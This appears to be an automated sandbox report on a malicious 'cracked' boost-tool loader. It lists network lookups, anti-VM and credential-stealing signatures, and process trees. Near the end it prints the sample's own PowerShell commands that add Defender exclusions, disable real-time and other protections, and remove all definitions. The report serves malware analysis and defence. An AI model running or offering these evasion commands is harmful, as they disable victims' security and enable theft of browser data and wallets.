US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 92.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/648-2-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-0-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-3-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-1-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-4-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-5-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-6-0x000000006DD20000-0x000000006E6FF000-memory.dmp

memory/648-7-0x000000006DD20000-0x000000006E6FF000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 1856 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 2064 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1800 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1800 wrote to memory of 4656 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2064 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4260 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3668 wrote to memory of 2872 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3632 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 3632 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 404 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 404 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5104 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 5104 wrote to memory of 4592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3904 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3904 wrote to memory of 4284 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2064 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\System32\Conhost.exe
PID 2064 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\System32\Conhost.exe
PID 2080 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2080 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2064 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4192 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4192 wrote to memory of 412 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2064 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1108 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1108 wrote to memory of 376 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2064 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4288 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4288 wrote to memory of 640 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2064 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4240 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4240 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe
PID 116 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe
PID 2064 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1564 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe C:\Windows\system32\cmd.exe
PID 1564 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\onefile_116_133633453809592017\loader.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 4424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3612 wrote to memory of 4424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2064 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 2064 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

